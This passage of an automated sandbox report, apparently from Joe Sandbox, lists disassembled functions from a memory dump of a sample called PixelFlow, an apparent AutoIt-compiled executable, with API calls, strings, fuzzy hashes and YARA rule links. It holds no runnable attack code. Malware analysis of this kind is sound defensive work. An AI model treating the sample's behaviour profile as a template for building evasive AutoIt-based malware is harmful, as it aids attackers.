Instruction Fuzzy Hash: A5E02631815611AFA3106B78EC4D8EA3B5EDE47339F100B16FA31C26E0EF709D4096D6

Function 006094E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed75feb00de69987c7dd1faac8a186f850e7dd4256408488712ac5917ed607a9
Instruction ID: d951440b515ae48c61eaecf88c6c89c19d119eed566c11855445009548cfe7e1
Opcode Fuzzy Hash: ed75feb00de69987c7dd1faac8a186f850e7dd4256408488712ac5917ed607a9
Instruction Fuzzy Hash: 8122AF70940216CFDB28DF54C490AEBB7F3FF49300F148469E956AB392E771A981CBA1

Function 00620D68 Relevance: 3.1, APIs: 2, Instructions: 94processCOMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 00620E05
CreateToolhelp32Snapshot.KERNEL32 ref: 00620E17

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ChangeCloseCreateFindNotificationSnapshotToolhelp32
String ID:
API String ID: 4162189087-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 9cc78a07b69f30d5ab0246c201de3fe71bde4e94880cbf4f60632cb5ffbd0c7d
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 0D310474A00515DBEB18DF58E4809A9FBA2FF49300B658AA5E44ACB352D730EDC1CFC0

Function 0060BC70 Relevance: 57.4, APIs: 22, Strings: 10, Instructions: 1379sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0060BF57

Part of subcall function 006052B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006052E6

Sleep.KERNEL32(0000000A,?,?), ref: 006435E5

Strings

prl, xrefs: 00643765
@COM_EVENTOBJ, xrefs: 00643C5E
@GUI_WINHANDLE, xrefs: 006436F1
prl, xrefs: 006436BB
@TRAY_ID, xrefs: 00643EFD
@GUI_CTRLHANDLE, xrefs: 00643746
prl, xrefs: 00643F22
CALL, xrefs: 0060C277
@GUI_CTRLID, xrefs: 0064369C
prl, xrefs: 00643710

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL$prl$prl$prl$prl
API String ID: 1792118007-2281372391
Opcode ID: 62c0541e05c48e6e868fc8d5a11bd93c246f390432521c35b33ae76fab42fa80
Instruction ID: 17eb11c1c87ddddf45e6e22c077fb8b57d6d40b38da9ec7cfd43bd0076377f9d
Opcode Fuzzy Hash: 62c0541e05c48e6e868fc8d5a11bd93c246f390432521c35b33ae76fab42fa80
Instruction Fuzzy Hash: 2CC2BD706483419FD728DF24C885BABB7E6BF84304F14891DF58A8B3A1DB71E945CB86

Function 006033E5 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 75windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00603444
RegisterClassExW.USER32(00000030), ref: 0060346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0060347F
InitCommonControlsEx.COMCTL32(?), ref: 0060349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006034AC
LoadIconW.USER32(000000A9), ref: 006034C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006034D1

Strings

0, xrefs: 00603426
TaskbarCreated, xrefs: 00603474
AutoIt v3 GUI, xrefs: 00603460
+, xrefs: 0060342D

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 58662323f58425eadad59ecbec4d055e6332b2bf93ab859c7c52eb74e0c7c600
Instruction ID: 5d5ec8c4425d093926cecb5a8fc9c21e5e2f329a3d06af8af94a585019656759
Opcode Fuzzy Hash: 58662323f58425eadad59ecbec4d055e6332b2bf93ab859c7c52eb74e0c7c600
Instruction Fuzzy Hash: 253127B1841349EFEB409FA4D889AD9BBF6FF09320F10515AF551EB2A0D3B50651CFA4

Function 00603411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00603444
RegisterClassExW.USER32(00000030), ref: 0060346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0060347F
InitCommonControlsEx.COMCTL32(?), ref: 0060349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006034AC
LoadIconW.USER32(000000A9), ref: 006034C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006034D1

Strings

0, xrefs: 00603426
TaskbarCreated, xrefs: 00603474
AutoIt v3 GUI, xrefs: 00603460
+, xrefs: 0060342D

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: a1b8eb7db214b4b8f72c0b04b36a3d06362db220bca26d6a5c7ecb869e33e9a7
Instruction ID: 942c990ea33bc43a2d5e4eb9215518c83c71213ff820b02a4122c03f7a61823d
Opcode Fuzzy Hash: a1b8eb7db214b4b8f72c0b04b36a3d06362db220bca26d6a5c7ecb869e33e9a7
Instruction Fuzzy Hash: A321F7B1D11308AFEB00DFA4EC89B9DBBFAFB08710F00511AF911A62A0D7B555408FA5

Function 00612FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0061FFFA: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00613094), ref: 00620018

Part of subcall function 006207EC: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0061309F), ref: 0062080E

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006130E2
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0065013A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0065017B
RegCloseKey.ADVAPI32(?), ref: 006501B9
_wcscat.LIBCMT ref: 00650212

Strings

Include, xrefs: 00650131, 00650172
\, xrefs: 00650235
\Include\, xrefs: 0061309F
Software\AutoIt v3\AutoIt, xrefs: 006130D8

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: b993fd5feb387e79a97d7914a91ef8a64b5b68895d95c7d18087f736d7aece8e
Instruction ID: 1717838c154616bd77f2f02107efb270956506792ac8c35613e4d70c9ab3e98a
Opcode Fuzzy Hash: b993fd5feb387e79a97d7914a91ef8a64b5b68895d95c7d18087f736d7aece8e
Instruction Fuzzy Hash: 7C718A714083019ED350EF65EC51DABBBEAFF95350F44192EF845872A1EB309A88CF96

Function 0061514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00615156
LoadCursorW.USER32(00000000,00007F00), ref: 00615165
LoadIconW.USER32(00000063), ref: 0061517C
LoadIconW.USER32(000000A4), ref: 0061518E
LoadIconW.USER32(000000A2), ref: 006151A0
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006151C6
RegisterClassExW.USER32(?), ref: 0061521C

Part of subcall function 00603411: GetSysColorBrush.USER32(0000000F), ref: 00603444
Part of subcall function 00603411: RegisterClassExW.USER32(00000030), ref: 0060346E
Part of subcall function 00603411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0060347F
Part of subcall function 00603411: InitCommonControlsEx.COMCTL32(?), ref: 0060349C
Part of subcall function 00603411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006034AC
Part of subcall function 00603411: LoadIconW.USER32(000000A9), ref: 006034C2
Part of subcall function 00603411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006034D1

Strings

#, xrefs: 00615201
AutoIt v3, xrefs: 0061520B
0, xrefs: 006151FA

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 6449451a5e40c5ce06f288dcbe9418510110ebf86c9f60b1c535023998c48b3c
Instruction ID: deb60952d51c5d3916777b6ea6afd1db3f6b566482503bd158af91df5c952519
Opcode Fuzzy Hash: 6449451a5e40c5ce06f288dcbe9418510110ebf86c9f60b1c535023998c48b3c
Instruction Fuzzy Hash: 75212D71D00308AFEB109FA4EC09FAD7BB6FB08711F00512AF505AA2A0D7BA56549F98

Function 00675BE2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 00675C43
inet_addr.WSOCK32(?,?,?), ref: 00675C88
gethostbyname.WS2_32(?), ref: 00675C94
IcmpCreateFile.IPHLPAPI ref: 00675CA2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00675D12
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00675D28
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00675D9D
WSACleanup.WSOCK32 ref: 00675DA3

Strings

Ping, xrefs: 00675CC6

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: cb24490ed57b4b77ee0b91e4483dad8b70148d2464b0fee705b76aaef59e22b9
Instruction ID: d1e621ee8f352ef5ce5e1a79f23a58865ede31bc3b37f28d06a9ac386e7c669e
Opcode Fuzzy Hash: cb24490ed57b4b77ee0b91e4483dad8b70148d2464b0fee705b76aaef59e22b9
Instruction Fuzzy Hash: 68519D716047009FD760EF24DC49B6ABBE6EF48710F0489AAF95ADB2E1DB70EC418B45

Function 00614D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00614E22
KillTimer.USER32(?,00000001), ref: 00614E4C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00614E6F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00614E7A
CreatePopupMenu.USER32 ref: 00614E8E
PostQuitMessage.USER32(00000000), ref: 00614EAF

Strings

TaskbarCreated, xrefs: 00614E75

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: d80c8e16862389af3197867e0ba059ed9643e5961a2cadb33a33748c0062874a
Instruction ID: 1c1cd24158328fdc4e2c3da21d6cfbc1f73b253adfc5bbfe5dee8a57d49335f8
Opcode Fuzzy Hash: d80c8e16862389af3197867e0ba059ed9643e5961a2cadb33a33748c0062874a
Instruction Fuzzy Hash: F1414731244245ABEF155F64DC09FFE36ABFB40311F08112EF902832A2CF65EC919769

Function 0060AD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0060ADE1
OleUninitialize.OLE32(?,00000000), ref: 0060AE80
UnregisterHotKey.USER32(?), ref: 0060AFD7
DestroyWindow.USER32(?), ref: 00642E94
FreeLibrary.KERNEL32(?), ref: 00642EF9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00642F26

Strings

close all, xrefs: 0060ADDC

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 0f46221844fdd32dc314e5caef0c7e0d8c873dd68f434d8c1a8d71e61497636a
Instruction ID: b64c275ab077b80e464d3a1d5adf220216b184ae767ea0d2f87cd92fe9b84775
Opcode Fuzzy Hash: 0f46221844fdd32dc314e5caef0c7e0d8c873dd68f434d8c1a8d71e61497636a
Instruction Fuzzy Hash: 22A19130741213CFDB59EF54C5A4AAAF766BF04740F6442ADF80AAB291CB30AC56CF95

Function 006156F8 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00650BDB

Part of subcall function 00611821: _memmove.LIBCMT ref: 0061185B

_memset.LIBCMT ref: 00615787
_wcscpy.LIBCMT ref: 006157DB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006157EB
__swprintf.LIBCMT ref: 00650C51

Strings

Line %d: , xrefs: 00650C4B
2#2#, xrefs: 00650C15, 00650C1E, 00650C29, 00650C37, 00650C22, 00650C2D
AutoIt - , xrefs: 00615760

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
String ID: Line %d: $2#2#$AutoIt -
API String ID: 230667853-2022516920
Opcode ID: 0b7968af2deadef9d82a6c1b00f0aa2debc523658a31b8eb9b2eb6302bc4b467
Instruction ID: bd6f85273ebd8275400ba0323c0b467c54b2bd1ba8fb0bd162a6b75fbbfcc5ae
Opcode Fuzzy Hash: 0b7968af2deadef9d82a6c1b00f0aa2debc523658a31b8eb9b2eb6302bc4b467
Instruction Fuzzy Hash: 3F41F771008301AED361EB60DC46FEF77EEAF85354F08461EF585921A1DB34A689CB9A

Function 006674EE Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00667505

Part of subcall function 00620F16: std::exception::exception.LIBCMT ref: 00620F4C
Part of subcall function 00620F16: __CxxThrowException@8.LIBCMT ref: 00620F61

ReadFile.KERNELBASE(0000FFFF,00000000,0000FFFF,?,00000000), ref: 0066753C
EnterCriticalSection.KERNEL32(?), ref: 00667558
_memmove.LIBCMT ref: 006675A6
_memmove.LIBCMT ref: 006675C3
LeaveCriticalSection.KERNEL32(?), ref: 006675D2
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006675E7
InterlockedExchange.KERNEL32(?,000001F6), ref: 00667606

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 08a7b143026f6bfd9a6ace0fde8f10f44d93bf3cab5ccb92cc4f6b9bd4b66324
Instruction ID: 44620ddefa980632b0d70bf94400c541c6450ac68abdb118e6fa7f4bc6795ff1
Opcode Fuzzy Hash: 08a7b143026f6bfd9a6ace0fde8f10f44d93bf3cab5ccb92cc4f6b9bd4b66324
Instruction Fuzzy Hash: D731B271900215AFDB50DF64DD859AEB77AEF44300F1480AAFD04AB246DB30DA10DBA4

Function 0060AAAA Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 006206E6: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00620717
Part of subcall function 006206E6: MapVirtualKeyW.USER32(00000010,00000000), ref: 0062071F
Part of subcall function 006206E6: MapVirtualKeyW.USER32(000000A0,00000000), ref: 0062072A
Part of subcall function 006206E6: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00620735
Part of subcall function 006206E6: MapVirtualKeyW.USER32(00000011,00000000), ref: 0062073D
Part of subcall function 006206E6: MapVirtualKeyW.USER32(00000012,00000000), ref: 00620745

Part of subcall function 0061FE77: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0060AC6B), ref: 0061FED2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0060AD08
OleInitialize.OLE32(00000000), ref: 0060AD85
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00642E86

Strings

\dl, xrefs: 0060AB32
<gl, xrefs: 0060AC6B
cl, xrefs: 0060AB26

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Virtual$ChangeCloseFindHandleInitializeMessageNotificationRegisterWindow
String ID: <gl$\dl$cl
API String ID: 2135498668-3928898432
Opcode ID: 90af67bf7398e778b8923185dad7b15911f2f57dec8c5dc0fef614019aa86607
Instruction ID: adabd2425b7080cb4a0d287fdba45ef98612011e6320c82fddd98274bdf13822
Opcode Fuzzy Hash: 90af67bf7398e778b8923185dad7b15911f2f57dec8c5dc0fef614019aa86607
Instruction Fuzzy Hash: A681A9B09002808EC788DF29E955E797BEBEB98308710E52EF019C7262EB318444CF6D

Function 006150DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00615109
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0061512A
ShowWindow.USER32(00000000), ref: 0061513E
ShowWindow.USER32(00000000), ref: 00615147

Strings

AutoIt v3, xrefs: 00615101, 00615106, 00615107
edit, xrefs: 00615124

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: fa6220040d6ef0fd4a46f935f3271efca2b3d23b372525d87cc681adfa6d874a
Instruction ID: 4d25ea6a9027ae6d987c98d0797039ba2f055f4f23814884505cae58044b0bc0
Opcode Fuzzy Hash: fa6220040d6ef0fd4a46f935f3271efca2b3d23b372525d87cc681adfa6d874a
Instruction Fuzzy Hash: BFF0DA716412947EFF311B67EC48E372E7FD7C6F60F01112AB900A61B1C6A91951DAB4

Function 00669983 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00614A8C: _fseek.LIBCMT ref: 00614AA4

Part of subcall function 00669B5E: _wcscmp.LIBCMT ref: 00669C4E
Part of subcall function 00669B5E: _wcscmp.LIBCMT ref: 00669C61

_free.LIBCMT ref: 00669ACC
_free.LIBCMT ref: 00669AD3
_free.LIBCMT ref: 00669B3E

Part of subcall function 00622EB5: RtlFreeHeap.NTDLL(00000000,00000000,?,00629B84,00000000,00628C8D,006258F3,?), ref: 00622EC9
Part of subcall function 00622EB5: GetLastError.KERNEL32(00000000,?,00629B84,00000000,00628C8D,006258F3,?), ref: 00622EDB

_free.LIBCMT ref: 00669B46

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 006699FC

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

